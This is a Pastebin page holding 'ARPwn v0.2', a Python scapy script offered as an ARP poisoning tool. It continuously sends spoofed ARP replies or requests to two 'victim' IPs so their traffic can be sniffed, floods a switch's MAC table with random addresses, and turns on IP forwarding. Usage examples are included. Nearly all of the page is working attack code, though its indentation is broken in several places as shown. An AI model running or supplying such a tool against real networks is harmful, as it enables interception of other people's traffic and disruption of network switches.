Advertisement
Guest User

ARPwn v0.2 by Muffins

a guest
Oct 20th, 2013
4,990
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.55 KB | None | 0 0
  1. #!/usr/bin/python
  2. #
  3. #        ARPwn v0.2 (2013)
  4. #   Muffin's ARP Poisoning Tool
  5. #
  6. # This tool can poison the ARP tables of two targets with
  7. # either ARP replies OR ARP requests.  It can also flood the ARP
  8. # table of a single machine or a whole subnet( $10,000 switch = $10 hub )
  9. #
  10. #Usage:
  11. #
  12. #  Enable ip forwarding with "./arpwn -f 1", where 1 is ON and 0 is OFF
  13. #
  14. #Two way ARP poisoning:
  15. #
  16. #  "./arpwn -flag delay target_ip1 target_ip2", where -flag = -r or -q
  17. #
  18. #  -r is for ARP replies and -q is for ARP requests
  19. #
  20. #   delay is an integer
  21. #
  22. #   Now you can open your sniffing software and capture.
  23. #
  24. #MAC Flooding:
  25. #
  26. #  "./arpwn -m Target_MAC SRC_IP
  27. #
  28. #  IMPORTANT: SRC_IP is a spoofed source ip of the form W X Y Z
  29. #  where W X Y Z are integers 0-255 or rand
  30. #
  31. #  Example: "./arpwn -m ff:ff:ff:ff:ff:ff 10 rand 0 rand
  32. #
  33. #  Here rand will cause the program to generate a random integer
  34. #  0-255.  So this example might generate the first ip as
  35. #  
  36. #  10.32.0.125, or 10.15.0.12, or any other ip of that form.
  37. #
  38. #  NOTE: If using rand, each new ARP packet will mostly
  39. #  have a different ip, of course there will be repeats at some point.
  40. #
  41. #  Questions?  Email me at gotnerdy@gmail.com  
  42.  
  43.  
  44.  
  45.  
  46. from scapy.all import *
  47. import sys
  48. import time
  49. import os
  50.  
  51. try:
  52.     if sys.argv[1] == "-r" :
  53.  
  54.         delay = int(sys.argv[2])
  55.         victim1 = sys.argv[3]
  56.         victim2 = sys.argv[4]
  57.         #mac = sys.argv[3]
  58.  
  59.         a = ARP()
  60.         a.op = 2
  61.         #a.hwdst = mac
  62.        
  63.         print ""
  64.         print "ARPwn v0.2 (2013)"
  65.         print "Muffins' ARP Poisoning Tool"
  66.         print ""
  67.         print "ARP Reply Mode"
  68.         print "Victim 1: "+victim1
  69.         print "Victim 2: "+victim2
  70.         print "Continuous Delay: "+str(delay)+" second(s)"
  71.         print ""
  72.         print "Ctrl-C to quit"
  73.         try:
  74.             while 1:
  75.                 a.psrc = sys.argv[3]
  76.                 a.pdst = sys.argv[4]
  77.                 send(a,verbose = 0)
  78.    
  79.                 a.psrc = sys.argv[4]
  80.                 a.pdst = sys.argv[3]
  81.                 send(a,verbose = 0)
  82.    
  83.                 time.sleep(delay)
  84.         except:
  85.             sys.exit(0)
  86.  
  87.     elif sys.argv[1] == "-q":
  88.    
  89.         delay = int(sys.argv[2])
  90.         victim1 = sys.argv[3]
  91.             victim2 = sys.argv[4]
  92.  
  93.         a = ARP()
  94.             a.op = 1
  95.  
  96.         print ""
  97.             print "ARPwn v0.2 (2013)"
  98.             print "Muffins' ARP Poisoning Tool"
  99.             print ""
  100.         print "ARP Request Mode"
  101.             print "Victim 1: "+victim1
  102.             print "Victim 2: "+victim2
  103.             print "Continuous Delay: "+str(delay)+" second(s)"
  104.             print ""
  105.             print "Ctrl-C to quit"
  106.             try:
  107.                     while 1:
  108.                             a.psrc = sys.argv[3]
  109.                             a.pdst = sys.argv[4]
  110.                             send(a,verbose = 0)
  111.  
  112.                             a.psrc = sys.argv[4]
  113.                             a.pdst = sys.argv[3]
  114.                             send(a,verbose = 0)
  115.  
  116.                             time.sleep(delay)
  117.             except:
  118.                     sys.exit(0)
  119.  
  120.     elif sys.argv[1] == "-m":
  121.         try:
  122.             e = Ether()
  123.             a = ARP()
  124.             a.op = 2
  125.             e.dst = sys.argv[2]
  126.             e.hwdst = sys.argv[2]
  127.  
  128.             print ""
  129.             print "ARPwn v0.2 (2013)"
  130.             print "Muffins' ARP Poisoning Tool"
  131.             print ""
  132.             print "MAC Flooding "+str(sys.argv[2])
  133.             print ""
  134.             print "Ctrl-C to quit"
  135.             while 1:
  136.                         src_mac = RandMAC()
  137.                                 e.src = src_mac
  138.                                 a.hwsrc = src_mac
  139.                    
  140.                 if sys.argv[3] == "rand":
  141.                     result = str(random.randint(0,255))
  142.                 else:
  143.                     result = str(sys.argv[3])
  144.                 for t in range(4,7):
  145.                     if sys.argv[t] == "rand":
  146.                         result = result+"."+str(random.randint(0,255))
  147.                     else:
  148.                         result = result+"."+sys.argv[t]
  149.  
  150.                 a.psrc = result
  151.                 sendp(e/a,verbose = 0)
  152.         except:
  153.             sys.exit(0)
  154.     elif sys.argv[1] == "-f":
  155.         try:
  156.             if int(sys.argv[2]) == 0:
  157.                 os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
  158.                 print "IP Forwarding is now OFF"
  159.             elif int(sys.argv[2]) == 1:
  160.                 os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")    
  161.                 print "IP Forwarding is now ON"
  162.        
  163.         except:
  164.             sys.exit(0)
  165.     else:
  166.         pass
  167.  
  168.  
  169. except:
  170.         print ""
  171.     print "You have done something wrong."
  172.     print ""
  173.     print "Usage:"
  174.     print " For two-way arp poisoning"
  175.     print " ./arpwn -type delay target_ip1 target_ip2"
  176.     print "     where -type is r for ARP replay"
  177.     print "     where -type is q for ARP request"
  178.     print ""
  179.     print " ex: ./arpwn -r 10 192.168.1.23 192.168.1.1"
  180.     print ""
  181.     print " For mac flood"
  182.     print "  ./arpwn -m DST_MAC SPOOF_IP"
  183.     print "     where DST is the destination mac"
  184.     print "     where SPOOF_IP is 0-225 or rand "
  185.     print ""
  186.     print "     ex: ./arpwn -m ff:ff:ff:ff:ff:ff 192 168 1 rand"
  187.     print ""
  188.  
  189. else:
  190.     pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement